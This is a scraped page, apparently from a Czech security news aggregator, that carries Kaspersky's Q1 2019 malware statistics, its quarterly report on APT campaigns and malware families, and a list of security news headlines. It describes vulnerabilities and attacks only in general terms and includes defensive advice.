!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new ransomware modifications, Q1 2018 – Q1 2019 (download)

Number of users attacked by ransomware Trojans

In Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.

In February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by ransomware Trojans, Q1 2019 (download)

Attack geography

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile ransomware Trojans, Q1 2019 (download)

Top 10 countries attacked by ransomware Trojans Country* % of users attacked by cryptors** 1 Bangladesh 8.11 2 Uzbekistan 6.36 3 Ethiopia 2.61 4 Mozambique 2.28 5 Nepal 2.09 6 Vietnam 1.37 7 Pakistan 1.14 8 Afghanistan 1.13 9 India 1.11 10 Indonesia 1.07

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 most common families of ransomware Trojans Name Verdicts* Percentage of attacked users** 1 WannaCry Trojan-Ransom.Win32.Wanna 26.25 2 (generic verdict) Trojan-Ransom.Win32.Phny 18.98 3 GandCrab Trojan-Ransom.Win32.GandCrypt 12.33 4 (generic verdict) Trojan-Ransom.Win32.Crypmod 5.76 5 Shade Trojan-Ransom.Win32.Shade 3.54 6 (generic verdict) Trojan-Ransom.Win32.Encoder 3.50 7 PolyRansom/VirLock Virus.Win32.PolyRansom 2.82 8 (generic verdict) Trojan-Ransom.Win32.Gen 2.02 9 Crysis/Dharma Trojan-Ransom.Win32.Crusis 1.51 10 (generic verdict) Trojan-Ransom.Win32.Cryptor 1.20

* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

Miners Statistics Number of new modifications

In Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new miner modifications, Q1 2019 (download)

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by miners, Q1 2019 (download)

Attack geography

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by miners, Q1 2019 (download)

Top 10 countries by share of users attacked by miners Country* %** 1 Afghanistan 12.18 2 Ethiopia 10.02 3 Uzbekistan 7.97 4 Kazakhstan 5.84 5 Tanzania 4.73 6 Ukraine 4.28 7 Mozambique 4.17 8 Belarus 3.84 9 Bolivia 3.35 10 Pakistan 3.33

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable applications used by cybercriminals

Statistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019 (download)

This quarter’s most popular vulnerabilities in the Microsoft Office suite were CVE-2017-11882 and CVE-2018-0802. They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is CVE-2017-8570, a logical vulnerability and an analog of the no less popular CVE-2017-0199. Next comes CVE-2017-8759, where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.

In Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often a problem, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.

However, this does not mean that in-depth attacks for browsers do not exist. A prime example is the actively exploited zero-day vulnerability CVE-2019-5786 in Google Chromehttps://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html. To bypass sandboxes, it was used in conjunction with an additional exploit for the vulnerability in the win32k.sys driver (CVE-2019-0808), with the targets being users of 32-bit versions of Windows 7.

It is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID CVE-2019-0797. This vulnerability exploited race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in Use-After-Free. It is worth noting that CVE-2019-0797 is the fourth zero-day vulnerability for Windows found by Kaspersky Lab recent months.

A remarkable event at the beginning of the year was the discovery by researchers of the CVE-2018-20250 vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.

Despite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks:

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2019, Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources located in 203 countries across the globe. 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of web attack sources by country, Q1 2019 (download)

This quarter, Web Anti-Virus was most active on resources located in the US.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Venezuela 29.76 2 Algeria 25.10 3 Greece 24,16 4 Albania 23.57 5 Estonia 20.27 6 Moldova 20.09 7 Ukraine 19.97 8 Serbia 19.61 9 Poland 18.89 10 Kyrgyzstan 18.36 11 Azerbaijan 18.28 12 Belarus 18.22 13 Tunisia 18.09 14 Latvia 17.62 15 Hungary 17.61 16 Bangladesh 17,17 17 Lithuania 16.71 18 Djibouti 16.66 19 Reunion 16.65 20 Tajikistan 16.61

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.

On average, 13.18% of Internet user computers worldwide experienced at least one Malware-class attack.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of malicious web attacks in Q1 2019 (percentage of attacked users) (download)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives.

In Q1 2019, our File Anti-Virus detected 247,907,593 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Uzbekistan 57.73 2 Yemen 57.66 3 Tajikistan 56.35 4 Afghanistan 56.13 5 Turkmenistan 55.42 6 Kyrgyzstan 51.52 7 Ethiopia 49.21 8 Syria 47.64 9 Iraq 46,16 10 Bangladesh 45.86 11 Sudan 45.72 12 Algeria 45.35 13 Laos 44.99 14 Venezuela 44,14 15 Mongolia 43.90 16 Myanmar 43.72 17 Libya 43.30 18 Bolivia 43,17 19 Belarus 43.04 20 Azerbaijan 42.93

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.

On average, 23.62% of user computers globally faced at least one Malware-class local threat in Q1.

IT threat evolution Q1 2019

Kaspersky Securelist - 23 Květen, 2019 - 12:00

Targeted attacks and malware campaigns Go Zebrocy

Zebrocy was first observed being used as a Sofacy backdoor in 2015. However, the collection of cases where this tool has been used mean that we consider it a subset of activity in its own right. On the basis of this threat actor’s past behaviour, we predicted last year that Zebrocy would continue to innovate in its malware development. The group has developed using Delphi, AutoIT, .NET, C# and PowerShell. Since May 2018, Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled open-source language.

Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East. The group also continued to innovate. Much of the spear-phishing remains thematically the same and continues to be characteristically high volume for a targeted attacker – a trend that is likely to continue. However, the remote locations of the Central Asian targets are becoming more spread out – including South Korea, the Netherlands and others. The focus to date has been on Windows, but we expect the group to continue making further innovations within its malware set – perhaps all their components will soon support every platform used by their victims, including Linux and Mac OS.

GreyEnergy overlap with Zebrocy

GreyEnergy is believed to be a successor to the BlackEnergy group (aka Sandworm), best known for its involvement in attacks on Ukrainian energy facilities in 2015 that led to power outages. Like its predecessor, GreyEnergy has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and Zebrocy.

No direct evidence exists as to the origins of GreyEnergy, but the links between GreyEnergy and Zebrocy suggest the groups are related. Kaspersky Lab researchers have detailed how both groups shared the same C2 (command-and-control) server infrastructure for a certain period of time and how both targeted the same organization almost simultaneously, which more or less confirms the relationship between the two.

Chafer uses Remexi malware to spy on Iran-based diplomatic agencies

Throughout autumn 2018, we analyzed a long-standing (and still active at that time) cyber-espionage campaign that primarily targeted foreign diplomatic entities in Iran. The attackers used an improved version of the Remexi malware, previously associated with an APT threat actor that Symantec calls Chafer. This group has been observed since at least 2015, but based on things such as compilation time-stamps, and C2 registration, it’s possible that the group has been active for even longer. Traditionally, Chafer has focused on targets inside Iran, although its interests clearly include other countries in the Middle East.

The attackers rely heavily on Microsoft technologies on both client and server sides. The Trojan uses standard Windows utilities such as the Microsoft BITS (Background Intelligent Transfer Service) “bitsadmin.exe” to receive commands and exfiltrate data. This data includes keystrokes, screenshots, and browser-related data such as cookies and history, decrypted where possible. The C2 is based on IIS using .ASP technology to handle the victims’ HTTP requests.

New zero-day vulnerability exploited by APT threat actors

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered recently using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on February 22, who confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on March 12, 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. Just as with CVE-2018-8589, we believe that this exploit is being used by several threat actors, including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT actor that we discovered only recently.

Lazarus continues to target crypto-currency exchanges

The Lazarus APT group is well-known for targeting financial organizations. In the middle of 2018, we published our report on ‘Operation AppleJeus‘, highlighting the threat actor’s focus on crypto-currency exchanges, using a fake company with a backdoored product aimed at crypto-currency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers.

The Lazarus group continues to update its TTPs (Tactics, Techniques and Procedures) to help it fly under the radar. We would urge organizations involved in the booming crypto-currency or technological startup industry to exercise extra caution when dealing with new third parties or installing software. It’s best to check new software with an anti-virus program or at least use popular free virus-scanning services such as VirusTotal. You should never set ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. If you need to try out new applications, it’s better to do so offline or on an isolated network virtual machine which you can erase with a few clicks. For more details on this and other research, you can subscribe to our APT intelligence reports.

Under the [Shadow]Hammer

In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels. ASUS has a wide install base, making this an attractive target for APT threat actors. The compromised version of the utility was distributed to a large number of people between June and November 2018. Our telemetry shows that 57,000 Kaspersky Lab customers downloaded and installed it, although we believe the real scale of the problem is much bigger, possibly affecting over a million users worldwide.

The goal of the attack was to surgically target an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses in the Trojanized samples, which identifies the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist which target different MAC addresses. You can check if your MAC address is on the target list here.

Other malware news Razy Trojan steals crypto-currency

While many browser extensions make our lives easier, some are altogether more dangerous, bombarding us with advertising or collecting information about our activities. Some are even designed to steal money. We recently reported the Razy Trojan, malware that installs a malicious browser extension on the victim’s computer or infects an already installed extension. To do so, it disables the integrity check for installed extensions and automatic updates for the targeted browser. The Trojan works with Google Chrome, Mozilla Firefox and Yandex browsers, though it has different infection scenarios for each browser type. Razy spreads via advertising blocks on websites and is distributed from free file-hosting services under the guise of legitimate software. Razy serves several purposes, mostly related to the theft of crypto-currency. Its main tool, the script ‘main.js’, is capable of searching for addresses of crypto-currency wallets on websites and replacing them with the attacker’s wallet addresses, spoofing images of QR codes pointing to wallets, modifying the web pages of crypto-currency exchanges and spoofing Google and Yandex search results.

Turning ATMs into slot machines

‘Jackpotting’ refers to the fraudulent methods used by criminals to obtain cash from ATMs. One recent example is the WinPot malware. The malware is notable because the criminals designed the user interface to resemble a slot machine.

However, unlike the machines in a casino, an ATM infected with WinPot always pays out – to the criminals. The malware window displays the denomination of banknotes for each cassette, so that the money mule operating the malware just needs to select the cassette with the most money in it and press ‘Spin’. The ‘Scan’ button can be used to recount the notes. The authors also include an emergency ‘Stop’ button, to allow the mule to cut short the pay out so as not to arouse suspicion.

There are several versions of the malware, and while their core functionality is essentially the same, there are some differences. For example, some versions will only dispense cash for a limited period of time and then they deactivate themselves. As with Cutlet Maker, WinPot is available on the Darknet for between $500 and $1,000, depending on the version.

To block attacks of this kind, we recommend that banks adopt device control and whitelisting. The former will block attempts to implant malware in the ATM using a USB device, while the latter will prevent execution of unauthorized software on the ATM. Kaspersky Embedded Systems Security can be used to secure ATMs.

Pirate Matryoshka

Using torrent trackers to spread malware is a well-known practice: cybercriminals disguise it as popular software, computer games, media files and other sought-after content. Earlier this year we detected one such campaign, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies for paid programs. The tracker contained malicious torrents created from dozens of different accounts, including those registered on TBP for quite some time. Instead of the expected software, the downloaded file was a Trojan, Pirate Matryoshka, whose basic logic was implemented by SetupFactory installers.

During the initial stage, the installer decrypts another SetupFactory installer to display a phishing web page. This page opens directly in the installation window and requests the user’s TBP account credentials, supposedly to continue the process. The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence. The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (which Kaspersky Lab classifies as adware). These usually find their way on to people’s computers through file sharing sites. Besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel.

The other two files are auto-clickers written in Visual Basic that are required to prevent the user from canceling the installation of additional software (in which case the cybercriminals would go away empty-handed). The auto-clickers are run before the installers: when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

Pirate Matryoshka results in the victim being flooded with unwanted programs. The owners of file partner programs often do not track the programs offered in their downloaders: our research shows that one in five files offered by partner installers is malicious, including pBot, Razy and others.

Mirai now used to target enterprise devices

Researchers from Palo Alto Networks’ Unit 42 recently reported a new variant of Mirai, the infamous IoT botnet. This malware is best known for its use in a massive DDoS attack on the servers of DNS provider Dyn, in 2016. The botnet is now equipped with a much wider range of exploits, which makes it even more dangerous and allows it to spread faster.

More troubling is the fact that the new strain is targeting not only its usual victims – routers, IP cameras, and other ‘smart’ things – but also enterprise IoT devices. This is no surprise since the Mirai source code was leaked some time ago, allowing any attacker with sufficient programming skills to use it. This explains why this botnet features highly in our report, ‘DDoS attacks in Q4 2018‘; and the fact that, in our report, ‘New trends in the world of IoT threats‘, Mirai is responsible for 21% of all IoT infections.

It is possible that future waves of Mirai infections might even include industrial IoT devices.

To reduce the risk of Mirai infection, we recommend that you install patches and firmware updates as soon as they become available, monitor traffic coming from each device for abnormalities, change default passwords and enforce an effective password policy for staff and re-boot any device that is behaving strangely (this will remove the malware from the device, but will not, on its own, prevent re-infection. To help companies protect themselves against the latest IoT-related threats we have released a new intelligence data feed for IoT-related threats.

‘Collection #1’ and other data leaks

On January 17, security researcher Troy Hunt reported a leak of more than 773 million email addresses and 21 million unique passwords. The data, dubbed ‘Collection #1’, was originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this ‘new’ leak. The new data dump, dubbed ‘Collection #2-5’, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, were put up for sale on Dream Market, accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies was posted to the same market place. Then in March, the hacker behind the earlier data dumps posted stolen data from a further six companies.

One of the particularly worrying aspects of these leaks is the fact that not all of the companies affected had previously reported the data breaches.

The impact on a company affected by a data breach goes beyond the loss of data. It includes the costs of investigating the breach, closing any security loopholes and maintaining business continuity. On top of that, a company’s reputation can be affected, especially if it becomes clear that the company failed to take adequate steps to secure the personal data of its customers.

The impact on customers can also be dramatic, especially if they use the same login credentials to access other online services. You can find our advice on how to mitigate the impact of a data breach here.

Social engineering

In our threat predictions for 2019, we described social engineering as the most successful infection vector ever and indicated why we thought it would remain so. The key to its success lies in sparking the curiosity of potential victims. Massive data leaks, such as the ones discussed above, help attackers to fine-tune their approach, making it more successful. Phishers will latch on to any topic that they think will pique the interest of their victims. We saw this recently in a campaign that hooked into events in Venezuela.

On February 10, Juan Guaido made a public call for volunteers to join a new movement called ‘Voluntarios por Venezuela’ (Volunteers for Venezuela), to help international organizations deliver humanitarian aid to the country. The original website asks volunteers to provide their full name, personal ID, cell phone number, and whether they have a medical degree, a car, or a smartphone, and also their location. The volunteers sign up and then receive instructions on how to help.

Just a few days after the legitimate site appeared, an almost identical website appeared. Both the legitimate and fake sites used SSL from Let’s Encrypt. The scariest aspect was that these two different domains, with different owners, were resolved within Venezuela to the same IP address, belonging to the fake domain owner. So it didn’t matter if a volunteer opened the legitimate domain name or the fake one – in the end their personal information was injected into a fake site.

In this scenario, where DNS servers are being manipulated, we would strongly recommend using public DNS servers such as Google DNS servers (8.8.8.8 and 8.8.4.4) or CloudFlare and APNIC DNS servers (1.1.1.1 and 1.0.0.1). We also recommend using VPN connections without a third-party DNS.

LockerGoga ransomware attacks

Ransomware continues to be a problem for consumers and businesses alike, notwithstanding a relative decline in numbers in the last two years. In 2018, we blocked 765,538 crypto-ransomware attacks on computers protected by Kaspersky Lab products, of which around 220,000 included corporate customers.

The most recent to hit the headlines is LockerGoga, which recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom note asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins.

However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords, and removing their ability to even log back in to the system. In such cases, the victims may not even get to see the ransom note.

19-year-old bug in WinRAR

Recently, researchers from Check Point discovered a long-standing vulnerability in the popular WinRAR utility – used by around 500 million people worldwide. This path traversal zero-day vulnerability (CVE-2018-20250) enables attackers to specify arbitrary destinations during file extraction of ‘ACE’-formatted files, regardless of user input.

This vulnerability has been fixed in the latest version of WinRAR (5.70), but since WinRAR itself does not contain an auto-update feature, it’s probable that many existing users will continue to run out-of-date versions.

The internet of secure, and not so secure, things

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. These include household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys, as well as cars, medical devices, CCTV cameras and parking meters. This offers a broad attack surface for anyone looking to take advantage of security weaknesses – for whatever purpose. Sadly, all too often we see reports of vulnerabilities in smart devices that could leave both consumers and organizations open to attack.

In February, at MWC19, researchers from our ICS CERT presented a report on the security of artificial limbs developed by Motorica. They looked at three aspects: firmware, the handling of data and the security of data in the cloud.

On the plus side, they found no vulnerabilities in the firmware of the prosthetic limbs themselves, or in the handling of data – since data flows one way only, from the limb to the cloud, it’s not possible to hack the device and take control of it remotely. However, they did find flaws in the development of the cloud infrastructure that could allow an attacker to gain access to data from the smart limb.

Werner Schober, a researcher at SEC Consult took an intimate look at the security of a sex toy. The device, designed to connect to an Android or iOS smartphone using Bluetooth, is controlled through a special app, either locally or remotely. On top of this, the app features a fully-fledged social network with group chats, photo galleries, friend-lists and more. The researcher was able to access the data of all users of the device, including usernames, passwords, chats, images and videos. Even worse, he was able to find a way to control the devices of other users. There was no mechanism for updating the firmware. However, he was able to find interfaces on the device that the manufacturer had used for debugging purposes and forgotten to close.

Researchers at Pen Test Partners recently discovered a flaw that exposes the sensitive data of children wearing GPS tracking watches, including their name, parents’ details and real-time location information. This was because of a secure privilege escalation vulnerability. The system failed to validate that the user had the appropriate permission to obtain admin control, so that an attacker with access to the watch’s credentials could change the permissions at the backend, exposing access to the account information and data stored on the watch.

It’s essential that vendors consider security when products are being designed. However, it’s also vital that consumers consider security before buying any connected device. This includes disabling functions that you don’t need – or even asking yourself if you need a connected version of the device at all. It also means looking online for information about any vulnerabilities that may have been reported and checking to see if it’s possible to update the firmware on the device. Finally, it’s important to change the default password and replace it with a unique, complex password. You can use the free Kaspersky IoT Scanner to check your Wi-Fi network and tell you if the devices connected to it are safe.

WannaCry-Infested Laptop Starts at $1.13M in Art Auction

VirusList.com - 22 Květen, 2019 - 22:09
The "bestiary" houses six historical threats that combined resulted in at least $95B in damages worldwide.
Kategorie: Viry a Červi

Critical Flaws in Khan Academy Opened Door to Account Takeovers

VirusList.com - 22 Květen, 2019 - 19:44
The two critical cross-site request forgery flaws in the online learning non-profit Khan Academy have been resolved.
Kategorie: Viry a Červi

US Air Force probes targeted malware attack, blames... er, the US Navy? What?

The Register - Anti-Virus - 22 Květen, 2019 - 16:59
War crimes trial takes a fresh twist

The US Air Force has opened an investigation into a "malware" infection – which it is blaming on lawyers employed by the US Navy who are working on a war crimes case.…

Kategorie: Viry a Červi

Windows Zero-Day Drops on Twitter, Developer Promises 4 More

VirusList.com - 22 Květen, 2019 - 16:56
SandboxEscaper has released her latest local privilege-escalation exploit for Windows.
Kategorie: Viry a Červi

Google Stored G Suite Passwords in Plaintext Since 2005

VirusList.com - 22 Květen, 2019 - 15:16
Google said it had stored G Suite enterprise users' passwords in plain text since 2005 marking a giant security faux pas.
Kategorie: Viry a Červi

Instagram data from 49 million accounts found lying around online

Sophos Naked Security - 22 Květen, 2019 - 13:12
A security researcher has discovered a massive cache of data on millions of Instagram influencers, publicly accessible for everyone to see.

Some Androids don’t call 911 when you tell them to call an ambulance

Sophos Naked Security - 22 Květen, 2019 - 12:52
Sometimes you get a list of ambulance companies, sometimes a blog post on when it's OK to call an ambulance.

Don’t break Windows 10 by deleting SID, Microsoft warns

Sophos Naked Security - 22 Květen, 2019 - 12:44
Sometimes it's best not to tinker under the hood - especially when it comes to security IDs.

Hackers for hire – the good, the bad and the just-plain-scammers

Sophos Naked Security - 22 Květen, 2019 - 11:48
Google & UC San Diego researchers found that only 5 of 27 hacker-for-hire services actually launched attacks against their targets.

Bug-hunter reveals another 'make me admin' Windows 10 zero-day – and vows: 'There's more where that came from'

The Register - Anti-Virus - 22 Květen, 2019 - 05:59
Vulnerability can be exploited to turn users into system stars, no patch available yet

Updated  A bug-hunter who previously disclosed Windows security flaws has publicly revealed another zero-day vulnerability in Microsoft's latest operating systems.…

Kategorie: Viry a Červi

G Suite'n'sour: Google resets passwords after storing some unhashed creds for months, years

The Register - Anti-Virus - 22 Květen, 2019 - 02:00
Biz app login details encrypted at rest, though, ad giant insists

Google admitted Tuesday its paid-for G Suite of cloudy apps aimed at businesses stored some user passwords in plaintext albeit in an encrypted form.…

Kategorie: Viry a Červi

Mozilla Tackles Two Critical Flaws with Firefox 67 Release

VirusList.com - 21 Květen, 2019 - 23:21
Mozilla has released a host of fixes for its browser as it rolls out its latest 67 version of Firefox, which touts better speed and privacy.
Kategorie: Viry a Červi

Intel Fixes Critical, High-Severity Flaws Across Several Products

VirusList.com - 21 Květen, 2019 - 23:02
Intel has issued fixes for a slew of vulnerabilities, separate from the side-channel bugs disclosed last week.
Kategorie: Viry a Červi
Syndikovat obsah